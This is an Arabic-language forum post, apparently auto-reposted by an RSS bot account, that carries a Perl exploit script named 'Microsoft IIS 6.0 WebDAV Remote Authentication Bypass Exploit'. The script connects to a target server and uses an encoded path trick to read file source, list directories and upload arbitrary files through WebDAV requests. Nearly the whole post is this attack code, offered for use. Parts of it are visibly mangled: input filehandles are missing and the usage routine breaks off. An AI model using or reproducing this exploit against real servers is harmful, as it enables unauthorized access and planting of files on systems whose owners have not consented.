حالة الموضوع:
مغلق
  1. .:: RSS ::.

    .:: RSS ::. عضوية آلية

    الأنتساب:
    ‏9 سبتمبر 2011
    المشاركات:
    14,005
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    36
    الإقامة:
    IQ-T34M
    <div>السلام عليكم ورحمة الله وبركاته



    <div align="left"><div style="margin:20px; margin-top:5px"> كود:
    ##########################################################################################################
    // Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit

    ##########################################################################################################
    ----------------------------------------------------------------------------------------------------------

    -----------------------------------------------------------------------------------------------------------

    #!/usr/bin/perl -W
    #
    # Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit
    # written by KoDh3R
    #
    # Greets: @N014D0 @RedEyeSec

    use IO::Socket ;

    my ( $host, $path ) = @ARGV ;
    my $port = 80 ; # webserver port

    &usage unless $ARGV[1] ;

    $host =~ s/http:\/\/// if($host =~ /^http:\/\//i) ;
    $path =~ s/\/// if(substr($path, 0,1) eq '/');

    sub _file {
    $file = shift ;
    open(FILE, $file) || die "[-] ERROR: ".$!,"\n" ;
    while( ){
    $cont .= $_ ;
    }
    close(FILE) ;
    return $cont ;
    }


    print "write 'help' for get help list\n";


    while( 1 ) {

    my $sock = IO::Socket::INET->new (PeerAddr => $host,
    PeerPort => $port,
    Proto => 'tcp') || die "\n[-] ERROR: ".$!,"\n" ;
    print "\$> ";
    chomp( my $option = ) ;
    last if $option eq 'quit' ;

    if($option eq 'source') {
    $path =~ s/\//%c0%af\// ;
    print $sock "GET /".$path." HTTP/1.1\r\n" ;
    print $sock "Translate: f\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock "Connection: close\r\n\r\n" ;

    while(){
    print $_ ;
    }
    close($sock) ;
    }


    elsif($option eq 'path') {
    $path =~ s/\//%c0%af\// ;
    print $sock "PROPFIND /".$path." HTTP/1.1\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock "Connection:close\r\n" ;
    print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
    print $sock "Content-Length: 0\r\n\r\n" ;
    print $sock '' ;

    while(){
    print $_ ;
    }
    close($sock) ;
    }


    elsif($option eq 'put') {
    $path =~ s/\//%c0%af\// ;
    print "
    [*] Insert a local file (ex: /root/file.txt): " ;
    chomp( $local = ) ;
    $file_l = _file( $local ) ;
    print $sock "PUT /".$path."my_file.txt HTTP/1.1\r\n" ;
    print $sock "Host: ".$host."\r\n" ;
    print $sock 'Content-Type: text/xml; charset="utf-8"'."\r\n" ;
    print $sock "Connection:close\r\n" ;
    print $sock "Content-Length: ".length($file_l)."\r\n\r\n" ;
    print $sock $file_l,"\r\n" ;

    while(){
    print $_ ;
    }
    close($sock) ;
    }

    elsif($option eq 'help') {
    print "\n\t\t- OPTIONS -\n\n\n" ;
    print "\thelp\t\tgive this help list\n" ;
    print "\tsource\t\tget file content\n" ;
    print "\tpath\t\tget directory contents\n" ;
    print "\tput\t\tput file\n" ;
    print "\tquit\t\texit exploit\n\n" ;
    }

    }

    sub usage {
    print
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة